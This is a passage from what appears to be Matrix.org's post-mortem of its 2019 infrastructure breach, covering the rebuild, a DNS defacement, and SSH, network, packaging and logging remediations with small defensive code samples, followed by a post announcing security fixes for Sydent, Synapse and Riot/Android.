We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.
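
For context, 4096 rounds corresponds to a bcrypt cost factor of 12 (2^12 iterations). A minimal sketch of that style of hashing, using the Python bcrypt library, looks like the following - purely illustrative, not Synapse's actual password-handling code:

# Illustrative only: hash and verify a password with a bcrypt cost factor
# of 12, i.e. 2**12 = 4096 rounds. Not Synapse's actual implementation.
import bcrypt

def hash_password(password: str) -> bytes:
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt(rounds=12))

def check_password(password: str, stored_hash: bytes) -> bool:
    return bcrypt.checkpw(password.encode("utf-8"), stored_hash)

if __name__ == "__main__":
    h = hash_password("correct horse battery staple")
    print(check_password("correct horse battery staple", h))  # True
    print(check_password("wrong password", h))                # False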

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

🔗The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

🔗The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing components with more secure alternatives where needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • WordPress has been replaced by statically generated sites (e.g. Gatsby)
  • cgit has been replaced by GitLab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

🔗Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that they had taken advantage of during the breach. Their findings matched those from our own forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

🔗SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

🔗SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommends using more modern protocols than scp).
  • If you need to regularly copy stuff from one server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

🔗SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main means of access to the dev network, with SSH bastion hosts as the only access point into production, using SSH keys to restrict access to be as minimal as possible.

🔗SSH keys should give minimal access

Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

🔗Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

🔗It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

🔗Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

🔗SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that OpenSSH packages start shipping secure-by-default configurations, as a number of the legacy options just don’t need to exist on most newly provisioned machines.

🔗Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

🔗Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to cover outdated dependencies in our distributed software (Riot, Synapse, etc.) too, given the discipline of regularly chasing outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

🔗Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

🔗Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response, prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint a named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence for forensics, mitigations, communication, secret rotation etc., rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to inform the ICO (Information Commissioner's Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

🔗Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

🔗Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try to do it right the first time - and failing that, assign responsibility to someone to fix it properly later, and to someone else to check that it actually happens. In other words, the only way to dig out of temporary measures like this is to project-manage the follow-up, or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

🔗Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

🔗Dev and CI infrastructure

The main change in our dev and CI infrastructure is the move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
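
As a rough sketch of this 'poke, then pull' pattern (every name, path and the shared-secret scheme below is hypothetical - this is not our actual deployment code): production runs a small authenticated hook behind HTTPS which, when poked, downloads the named artifact from CI itself rather than accepting anything pushed over SSH.

# Hypothetical sketch of a pull-based deployment hook: CI pokes this
# endpoint over HTTPS (fronted by the loadbalancer), and production then
# downloads the named artifact from CI itself. No SSH push into production.
import hmac
import os
import re
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

CI_BASE_URL = "https://ci.example.org/artifacts/"   # hypothetical
DEPLOY_DIR = "/srv/deployments"                     # hypothetical
SHARED_SECRET = os.environ.get("DEPLOY_HOOK_SECRET", "")

class DeployHook(BaseHTTPRequestHandler):
    def do_POST(self):
        token = self.headers.get("X-Deploy-Token", "")
        artifact = self.headers.get("X-Artifact-Name", "")
        # Constant-time comparison of the shared secret, plus a strict
        # allow-list on the artifact name to avoid path traversal.
        if (not SHARED_SECRET
                or not hmac.compare_digest(token, SHARED_SECRET)
                or not re.fullmatch(r"[A-Za-z0-9._-]+", artifact)):
            self.send_response(403)
            self.end_headers()
            return
        # Production pulls the artifact from CI over HTTPS.
        urllib.request.urlretrieve(
            CI_BASE_URL + artifact, os.path.join(DEPLOY_DIR, artifact)
        )
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), DeployHook).serve_forever()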

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

🔗Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc) - see the sketch after this list.
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.
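
To give a flavour of what hashing or truncating PII before logging might look like, here's a minimal sketch - the helper names are hypothetical and this is not code from Synapse:

# Hypothetical sketch: redact identifiers before they reach the logs by
# hashing them (so the same value can still be correlated across log lines)
# or truncating them. Not actual Synapse code.
import hashlib
import logging

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("demo")

def hash_for_logs(value: str, length: int = 12) -> str:
    # Stable, non-reversible token for correlating log lines.
    return hashlib.sha256(value.encode("utf-8")).hexdigest()[:length]

def truncate_for_logs(value: str, keep: int = 6) -> str:
    # Keep only a short prefix, e.g. for access tokens.
    return value[:keep] + "..."

if __name__ == "__main__":
    user_id = "@alice:example.org"
    access_token = "syt_averysecretaccesstoken"
    logger.info("request from user=%s token=%s",
                hash_for_logs(user_id), truncate_for_logs(access_token))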

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

🔗Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, we should at least come out of it much stronger, particularly in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally those of the Matrix team who hauled ass to rebuild the infrastructure, as well as those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General Matthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail security@matrix.org to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

🔗Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update (see the sketch after this list for an illustration of this class of fix). Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.
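
To illustrate the class of fix in the first item above (a generic sketch, not Sydent's actual code): tokens and session identifiers should come from a cryptographically secure source such as Python's secrets module, never from the predictable random module.

# Generic sketch (not Sydent's actual implementation): generate
# authentication tokens from a CSPRNG so they cannot be predicted.
import random
import secrets
import string

def insecure_token(length: int = 32) -> str:
    # DON'T do this: random is a seeded Mersenne Twister, and its output
    # can be predicted by an attacker who observes enough values.
    return "".join(random.choice(string.ascii_letters) for _ in range(length))

def secure_token() -> str:
    # DO this: secrets draws from the operating system's CSPRNG.
    return secrets.token_urlsafe(32)

if __name__ == "__main__":
    print(secure_token())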

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

🔗Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

🔗Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.